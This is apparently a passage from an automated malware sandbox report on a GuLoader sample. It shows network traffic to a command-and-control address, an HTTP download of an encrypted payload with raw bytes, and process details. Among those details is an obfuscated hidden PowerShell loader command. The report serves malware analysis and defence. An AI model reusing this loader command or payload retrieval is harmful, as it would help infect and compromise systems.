Apr 25, 2024 21:37:05.474872112 CEST	2700	49740	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:05.980542898 CEST	49740	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:06.287874937 CEST	2700	49740	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:07.294682980 CEST	49741	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:07.606388092 CEST	3702	49741	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:08.121140003 CEST	49741	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:08.433052063 CEST	3702	49741	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:08.949294090 CEST	49741	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:09.261126041 CEST	3702	49741	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:09.761759996 CEST	49741	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:10.073520899 CEST	3702	49741	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:10.574358940 CEST	49741	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:10.886764050 CEST	3702	49741	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:10.888611078 CEST	49742	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:11.200284004 CEST	4089	49742	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:11.714890003 CEST	49742	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:12.026801109 CEST	4089	49742	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:12.527518988 CEST	49742	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:12.839139938 CEST	4089	49742	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:13.340145111 CEST	49742	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:13.651932955 CEST	4089	49742	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:14.152398109 CEST	49742	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:14.464304924 CEST	4089	49742	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:14.466233969 CEST	49743	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:14.777812958 CEST	4093	49743	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:15.293036938 CEST	49743	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:15.607398987 CEST	4093	49743	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:16.121186018 CEST	49743	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:16.433048964 CEST	4093	49743	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:16.933649063 CEST	49743	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:17.245426893 CEST	4093	49743	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:17.746301889 CEST	49743	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:18.058068037 CEST	4093	49743	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:18.060117960 CEST	49744	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:18.376573086 CEST	2700	49744	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:18.886848927 CEST	49744	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:19.203519106 CEST	2700	49744	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:19.714941978 CEST	49744	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:20.031402111 CEST	2700	49744	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:20.543029070 CEST	49744	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:20.859421015 CEST	2700	49744	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:21.371166945 CEST	49744	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:21.687679052 CEST	2700	49744	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:22.703252077 CEST	49745	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:23.019359112 CEST	3702	49745	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:23.527447939 CEST	49745	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:23.843570948 CEST	3702	49745	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:24.355549097 CEST	49745	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:24.671878099 CEST	3702	49745	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:25.183698893 CEST	49745	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:25.499816895 CEST	3702	49745	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:26.089939117 CEST	49745	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:26.406059980 CEST	3702	49745	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:26.408746958 CEST	49746	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:26.733689070 CEST	4089	49746	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:27.246196985 CEST	49746	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:27.571837902 CEST	4089	49746	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:28.074366093 CEST	49746	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:28.399455070 CEST	4089	49746	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:28.902405977 CEST	49746	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:29.227652073 CEST	4089	49746	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:29.730663061 CEST	49746	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:30.055682898 CEST	4089	49746	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:30.059196949 CEST	49747	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:30.385499954 CEST	4093	49747	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:30.886820078 CEST	49747	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:31.213196993 CEST	4093	49747	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:31.714986086 CEST	49747	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:32.041301966 CEST	4093	49747	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:32.543067932 CEST	49747	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:32.869482994 CEST	4093	49747	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:33.371277094 CEST	49747	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:33.697841883 CEST	4093	49747	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:33.703015089 CEST	49748	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:34.016426086 CEST	2700	49748	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:34.527610064 CEST	49748	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:34.839713097 CEST	2700	49748	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:35.340049028 CEST	49748	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:35.652132988 CEST	2700	49748	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:36.168056965 CEST	49748	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:36.480233908 CEST	2700	49748	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:36.996278048 CEST	49748	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:37.308336973 CEST	2700	49748	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:38.325778008 CEST	49749	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:38.642395020 CEST	3702	49749	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:39.152518034 CEST	49749	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:39.469146013 CEST	3702	49749	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:39.980637074 CEST	49749	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:40.297282934 CEST	3702	49749	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:40.808720112 CEST	49749	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:41.125216961 CEST	3702	49749	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:41.636953115 CEST	49749	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:41.953735113 CEST	3702	49749	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:42.667197943 CEST	49750	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:42.979259968 CEST	4089	49750	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:43.480593920 CEST	49750	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:43.795635939 CEST	4089	49750	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:44.308681011 CEST	49750	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:44.623965979 CEST	4089	49750	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:45.136826038 CEST	49750	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:45.448951006 CEST	4089	49750	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:45.949420929 CEST	49750	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:46.261482000 CEST	4089	49750	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:46.263597012 CEST	49751	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:46.576527119 CEST	4093	49751	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:47.090037107 CEST	49751	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:47.402256012 CEST	4093	49751	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:47.902477980 CEST	49751	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:48.214977980 CEST	4093	49751	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:48.715048075 CEST	49751	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:49.027230024 CEST	4093	49751	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:49.527460098 CEST	49751	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:49.839648962 CEST	4093	49751	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:49.843210936 CEST	49752	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:50.153318882 CEST	2700	49752	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:50.668236017 CEST	49752	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:50.978423119 CEST	2700	49752	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:51.480555058 CEST	49752	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:51.790252924 CEST	2700	49752	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:52.293118954 CEST	49752	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:52.603209019 CEST	2700	49752	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:53.105640888 CEST	49752	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:53.415385962 CEST	2700	49752	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:54.421336889 CEST	49753	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:54.732249975 CEST	3702	49753	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:55.246391058 CEST	49753	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:55.557365894 CEST	3702	49753	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:56.058741093 CEST	49753	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:56.369430065 CEST	3702	49753	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:56.871186972 CEST	49753	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:57.182044029 CEST	3702	49753	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:57.683773994 CEST	49753	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:57.994656086 CEST	3702	49753	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:57.996526957 CEST	49754	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:58.307713985 CEST	4089	49754	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:58.824325085 CEST	49754	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:59.135632038 CEST	4089	49754	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:59.636832952 CEST	49754	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:59.950170040 CEST	4089	49754	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:00.465004921 CEST	49754	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:00.776308060 CEST	4089	49754	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:01.293090105 CEST	49754	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:01.604470968 CEST	4089	49754	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:02.883555889 CEST	49755	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:03.195404053 CEST	4093	49755	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:03.699366093 CEST	49755	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:04.011271954 CEST	4093	49755	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:04.589946985 CEST	49755	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:04.901864052 CEST	4093	49755	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:05.402445078 CEST	49755	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:05.714282990 CEST	4093	49755	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:06.230596066 CEST	49755	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:06.542536020 CEST	4093	49755	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:06.543608904 CEST	49756	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:06.853622913 CEST	2700	49756	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:07.355603933 CEST	49756	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:07.665863037 CEST	2700	49756	193.239.86.203	192.168.2.4
Apr 25, 2024 21:38:08.168210983 CEST	49756	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:38:08.478349924 CEST	2700	49756	193.239.86.203	192.168.2.4

HTTP Request Dependency Graph

193.239.86.203

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	193.239.86.203	80	3844	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 21:36:46.812903881 CEST	170	OUT	GET /XWJPh99.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 193.239.86.203 Cache-Control: no-cache
Apr 25, 2024 21:36:47.124973059 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Wed, 24 Apr 2024 21:30:59 GMT Accept-Ranges: bytes ETag: "ae5de8b28e96da1:0" Server: Microsoft-IIS/8.5 Date: Thu, 25 Apr 2024 19:36:44 GMT Content-Length: 494656 Data Raw: df f1 9f 0c 28 df e8 5c f5 fa 59 3d 29 d8 5a 3f d4 8f 38 ac d9 4f 2a ae 1d c2 7f 8f 61 15 f8 71 47 a9 c3 3d e3 6b 22 3f 81 b1 e3 fd 96 ce 05 8d 6e 71 29 f6 2e 6b 84 06 cf 2e 9b 95 3f 54 ef 9e 67 c0 1b 4b 02 1c 1d 2f c1 0b e3 9c 1e 49 c5 f9 3a e2 c3 6e 29 68 8f 80 a7 02 68 36 70 ca c4 4f 96 1b 64 30 ea 4b 07 51 ab f7 83 e0 79 f4 c8 a3 fa f7 d4 2c c5 a0 00 29 75 7c 3b 0d 07 f5 b0 75 91 06 97 89 61 de e7 19 22 fc 4f 83 79 e3 33 f4 fc 19 fb 4e 93 3f 94 d8 33 bc 6a 1f 8f f6 d2 e3 0c d4 66 f1 6e e0 42 e3 ff 38 86 a6 ff c0 ea 22 ea c2 0b 89 7e 69 5a 6b 98 c5 60 8e 28 24 84 a4 49 b0 aa 4a 6c 32 82 44 e7 2c 84 20 18 45 e9 d5 cc e6 f1 85 ee 4c 62 e3 03 ab d9 1e 1a 25 69 d9 84 70 95 6e dd 0c 73 e4 1a 3c 0a 80 c5 f5 6d 78 f7 2c bb 9b c4 43 79 36 c2 64 98 5d 34 1d 25 84 db 25 32 76 b6 b8 ee 68 cb 07 5d a3 76 ba 77 7c ac 4d b1 bd bf ce 19 59 3b 1d b5 04 27 f8 aa ca 04 b1 8d 72 0d 5b aa 61 4b 2c 2c 75 8c d6 01 4b ce 76 36 c3 29 95 64 d2 57 f8 12 b1 2c d0 21 b3 e6 e5 6a 36 43 7f 80 e3 30 1d 7e 3a ff 3e d4 aa 2f 73 1c 91 43 14 fa 71 17 03 ff 39 0e 7f 8f af 5c 89 3c dc 9d a4 f6 54 ee 27 3d 03 3e 1e 16 47 18 8c 57 27 79 8b bf e4 1b 4a dc 1f f1 c5 9b 9d d8 6a 45 89 05 07 ee f0 5a 22 e7 c0 9a 51 fc e8 f6 1e bf 9e 2c bf ee 08 77 cc 9b 81 f0 77 45 3c 92 72 de 80 5a 5a 7b 2a a2 06 5c bc 75 b4 ea 96 12 0f c3 b2 15 3b 83 0f 60 3b 29 6a 6d 70 03 e7 5c eb 29 0c 2b 60 68 e8 80 8f 84 39 04 c5 3a e4 f5 81 b3 25 e8 15 5a 47 f7 32 41 10 d6 cf f9 fc 55 a0 17 b0 63 e0 fb 81 3f 2e 89 6a bd 62 b4 d9 3c f7 e8 c1 0f 4b 8b 1d 5e 3e 7a 48 67 67 73 c0 2f 76 2a d6 68 c8 34 b5 27 5d c4 4f b0 d2 9d 29 ba df fe e3 46 7f aa 72 b5 d7 99 ec 89 90 ea ef e1 0b 2e e2 60 b6 e2 07 f9 ae 8b fe fd bb 29 6b 4a cc 8f 79 8d e8 19 15 d7 b0 18 4d e1 4c 83 92 84 8e 77 3c e9 42 78 cf d9 c9 fb 84 2f a0 19 55 91 8e 69 92 e7 c8 36 00 f3 5d 55 51 26 2a 57 4a 21 69 19 00 5c 93 4e 43 2c 5d f2 5c 66 4d 05 fe 12 05 74 86 91 45 b4 00 81 23 31 93 ac fc 04 b8 8b 46 dd 98 49 55 d7 d4 2b 95 7d 56 ec 54 63 4d 07 be 29 1c be 21 c8 81 7f 07 bf b0 75 81 34 8b 32 1f e9 8f d4 20 b1 6d cd 8b b1 7a 87 18 11 83 a9 d1 df a6 0c 63 1c 57 fa ba f6 4c 74 12 08 10 71 aa 41 7d af c0 4b 76 9d e1 07 e1 03 6b 96 85 86 eb 37 0e 6e 2b 1f bb 49 a3 b5 9d 7a 21 ea 5d 00 ec df 1e e9 8c 7d 5f 86 5b 93 b2 1a e6 bb c8 52 89 ab 83 d4 34 bb 7e 2e 88 ea 72 2d 6e ae 8c 95 d1 b3 7c aa 19 4f 3b 1f 5a 77 42 06 94 3e 92 32 d5 11 98 19 4c 23 3a e3 7c 0e 85 ae 69 9d e3 a8 7e da 36 43 fc 9c 58 55 84 ed 2a 70 a6 0e c1 00 36 0a de 28 87 f4 88 79 26 7d 37 e5 71 80 5d 2a fd 67 26 df ee 5d 6f 78 78 f1 ac 38 b1 4e 9b 6b 17 da d6 17 5c 30 c8 80 c3 ef b4 74 93 69 a4 a3 5b 99 3d 44 5a 91 9a 63 bb 61 da 82 e6 bd 6b 39 97 89 4f 30 ca a6 1e 57 bf 97 08 66 56 61 99 4a 70 c6 12 e1 99 ec fa af 3b 28 af 43 08 4f 3f 5b 02 58 79 d3 ea 84 b7 13 b7 4d 4b 38 a4 75 a5 56 28 25 fe c5 98 2e b1 2f 80 0b 83 73 f0 6e a7 bf e4 07 88 cc 33 34 ef 51 28 04 90 55 9b 81 a1 f1 27 14 bd 48 14 90 56 72 95 d1 3f a9 48 9c 3f d9 18 3b 53 dc 5a 51 6b 23 df 3b e2 a7 23 15 ff 37 2f 84 aa f9 e4 18 b3 ce 66 46 81 88 ef d9 51 f9 b0 83 56 3d 2b a1 8c 5f f3 66 1b 42 a7 e0 c4 2e f0 23 fe 29 8a 78 96 68 31 7e 1c 66 d3 ce 48 38 a2 ba 8a 4e d1 dc Data Ascii: (\Y=)Z?8OaqG=k"?nq).k.?TgK/I:n)hh6pOd0KQy,)u\|;ua"Oy3N?3jfnB8"~iZk`($IJl2D, ELb%ipns<mx,Cy6d]4%%2vh]vw\|MY;'r[aK,,uKv6)dW,!j6C0~:>/sCq9\<T'=>GW'yJjEZ"Q,wwE<rZZ{\u;`;)jmp\)+`h9:%ZG2AUc?.jb<K^>zHggs/vh4']O)Fr.`)kJyMLw<Bx/Ui6]UQ&WJ!i\NC,]\fMtE#1FIU+}VTcM)!u42 mzcWLtqA}Kvk7n+Iz!]}_[R4~.r-n\|O;ZwB>2L#:\|i~6CXUp6(y&}7q]g&]oxx8Nk\0ti[=DZcak9O0WfVaJp;(CO?[XyMK8uV(%./sn34Q(U'HVr?H?;SZQk#;#7/fFQV=+_fB.#)xh1~fH8N
Apr 25, 2024 21:36:47.125024080 CEST	1289	IN	Data Raw: 30 a3 53 dc fe 48 4c cb 6b 2b 69 c5 0b 8f 17 87 18 0e 21 71 a1 e2 2f 4a d3 f5 89 3d a9 48 5e 21 c1 13 47 74 9a d9 04 fe 51 14 a9 01 fe 0f 97 17 11 71 f6 3d 98 bb 52 17 a9 50 68 2e 8a 8d 3e 8d 51 ba 77 64 f8 4e 15 22 a1 05 21 b7 51 15 13 6f b1 f6 Data Ascii: 0SHLk+i!q/J=H^!GtQq=RPh.>QwdN"!Qo"D^Y9>@YBhmOf}@^tz\`[qhj)S!#jK?;%4-Ig\|*Ix$Ls6:P@-c%<QzK{X4xxbmO6Knv/
Apr 25, 2024 21:36:47.125066042 CEST	1289	IN	Data Raw: da 6a 68 87 86 4b 63 f4 88 c7 b9 f6 24 77 93 4d d0 b7 a4 1f 0d af 99 88 1e d9 60 42 e1 eb 75 a3 86 86 b0 f4 66 39 54 5c bb a1 c1 87 9e 7a 78 29 35 61 6d 9a 1e 41 da 4f 9c a8 65 36 62 ae b4 fc c8 8a 2e 96 80 d4 dc d7 ff 6b 8c 02 32 1f 6d a9 d5 56 Data Ascii: jhKc$wM`Buf9T\zx)5amAOe6b.k2mVfXYXnN;r_1X)$:LWNCkzG<`1Y >]8z/2b0%%6'VjP.Ua%Mb>KUbx,[]KM^u
Apr 25, 2024 21:36:47.125117064 CEST	1289	IN	Data Raw: 08 35 1d 7e 9b 2b 55 93 aa be d6 19 92 0a 81 b0 36 4c 58 33 0c f1 4a 47 85 1b 89 c3 c9 39 30 b1 55 6e 2b e7 68 79 6c fb 90 e5 65 aa a4 44 df d4 a3 f4 fc aa 10 7a 1a 73 95 f6 fa 40 d8 8e c8 46 6b 74 32 e7 43 76 4b 71 ac d7 36 35 52 7c 57 54 0e 72 Data Ascii: 5~+U6LX3JG90Un+hyleDzs@Fkt2CvKq65R\|WTr{`R!5<*0i};H`uN}w\vR`Bi`Z>G\|xMS$]lOWj(\sZY/#Bht{)j[(.DiD1!9/)
Apr 25, 2024 21:36:47.436629057 CEST	1289	IN	Data Raw: a7 ba 22 44 ee b4 39 7c 92 74 0c 4b 72 b1 15 0e 39 08 93 12 ea d7 e3 8c 0d b2 c1 f2 e5 d5 97 b6 dc 5d e4 89 e2 bf 38 22 e0 46 62 6b 88 20 45 04 17 3a 7f 66 c7 b8 22 7b bb 22 6f b7 d8 9b ec 0c 9c 20 a7 49 86 55 e3 d1 24 8a bc 4f 64 7d 6e ff d7 2b Data Ascii: "D9\|tKr9]8"Fbk E:f"{"o IU$Od}n+Gxr)6@DMcN6}+9h;POKQ\|D"-8zNQw\|;gQaje]$KC}>GH\|CxpBzQ*2K$m.$/uc$WP>]Pl
Apr 25, 2024 21:36:47.436671972 CEST	1289	IN	Data Raw: 19 64 4f 6b fd c8 6d 06 65 19 90 ae a0 6d 9a 62 48 44 83 92 05 e5 fa 9b b0 fa 1b e3 5d 3d 03 a2 53 7f f9 1e 5b 76 65 3b 8a 27 ed 7d 30 b3 23 56 4b 4a 87 b2 0a 47 a2 47 90 0f 6a 9e 10 6e d6 53 9e 98 1a ca 3a 60 d4 37 0f c1 23 89 6f 7c ac bb ac 17 Data Ascii: dOkmembHD]=S[ve;'}0#VKJGGjnS:`7#o\|tLFq,)(;F\|EWFL60=KS'7x9(Bwu/v:-hhyG>MhV%s59:[L=@.w{Y]G>a0Y)=
Apr 25, 2024 21:36:47.436726093 CEST	1289	IN	Data Raw: c1 bf 2e 20 18 66 13 71 60 c4 18 f9 ab 91 4c 3f 5b e9 6a f9 af ce 94 b7 67 a8 ce b5 28 d7 6f 2e 99 c0 36 07 3a 67 a5 7e a4 80 30 73 7c b2 a8 f7 d5 e5 ef 1b 36 cc cb 04 5d ad f2 e5 5f cd 0a 6e 19 37 14 bd 48 91 66 09 7d 00 11 61 6b 40 9c d7 95 e7 Data Ascii: . fq`L?[jg(o.6:g~0s\|6]_n7Hf}ak@rR_tB'{#N\|>dO)zLrC(R!.#3[4r0.pb{-2mA6>x5F@ZUlH{%HgxglP:VHnJZ
Apr 25, 2024 21:36:47.436767101 CEST	1289	IN	Data Raw: cf fb eb c8 c5 6f 9e cb ed e3 b7 0a 9f 49 61 c3 f5 fc 86 fe 6b be d6 1f 6e c0 70 0d a9 e4 f1 91 3f 4f e7 ce 25 40 41 9a 84 67 69 3c e9 42 29 27 e9 bd 9e fc 02 62 1d 55 0d d8 6c 92 e7 89 de 18 f3 2f 50 08 e4 2a 57 a3 0a 69 19 00 e4 39 e4 e9 26 9e Data Ascii: oIaknp?O%@Agi<B)'bUl/PWi9&ybI<wlZ0mktH5+Z.Pc'()!;E8IrBQp+NMNAsZ6E8+$ob.dzyxF^S<VJbaNVXl.j8_{T*%9"G}gCUS
Apr 25, 2024 21:36:47.436806917 CEST	1289	IN	Data Raw: 6f 12 99 13 af 8f 68 ec f9 d5 30 03 65 30 6c 26 45 2b 11 37 a9 85 47 d2 c6 d6 51 5e 00 32 79 a3 60 0d 98 f7 5d d7 b7 9d ff 9d 72 25 09 54 72 f7 90 67 43 ef 74 a6 2b d7 53 56 17 fe 8c 0f e8 8d ef 9e 71 e6 8e b9 27 8e 79 4b ab 7f a4 f7 f0 90 c1 eb Data Ascii: oh0e0l&E+7GQ^2y`]r%TrgCt+SVq'yKf+G~<wlhAZt9Q *3;=5<C7f2Cp(mtBKyz\px[~;ElIs'!?ep{GT(pm]
Apr 25, 2024 21:36:47.436846972 CEST	1289	IN	Data Raw: ef 0b 6e 19 12 1d f2 fe 9d 40 17 db 1f 79 0a 19 e3 40 ef ce c6 ef 36 3c 8e df e1 95 81 a5 14 69 96 e0 c8 f7 05 4e 08 8e f5 b1 41 ee 49 47 81 d8 78 a1 f3 e2 ff b2 7a 35 6c 20 73 8c e5 ae 8b 52 d9 f9 6d c8 e4 af 83 24 27 08 82 fb e6 e9 6d 56 b9 eb Data Ascii: n@y@6<iNAIGxz5l sRm$'mV.Gp+_4cynB18M?7lQ{KFnp=^D+vD_6OvdxKM~Ic^67:1'p7DBuB^\h$gN[6p
Apr 25, 2024 21:36:47.436886072 CEST	1289	IN	Data Raw: a0 c4 a0 2b 02 cb a0 f3 1f 5f d1 7a cb 55 96 3f db c1 f1 ea 04 2a 41 7e ec 1e fa b7 29 2b 9a 46 ec b9 7f 3d 2a 78 e3 53 2d 6f 05 ea b1 c3 60 01 f8 67 b6 05 dd 87 0e 2a 96 1a ea ce ad 76 1d c7 cd af bd 54 5f f7 ea cc 62 95 b1 04 86 50 4c c0 22 29 Data Ascii: +_zU?A~)+F=xS-o`g*vT_bPL")9EqV=.[)_6'!'SQhgN =0gy#'y5-rsO1W<m'IB-}Ly%1vXeZ"zneTw]?PT{%%IcpSrz,

Target ID:	0
Start time:	21:35:55
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
Imagebase:	0x400000
File size:	794'761 bytes
MD5 hash:	1C089552C29F12843D8CD8E2BBF5CF5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:35:56
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Imagebase:	0x9f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:35:56
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
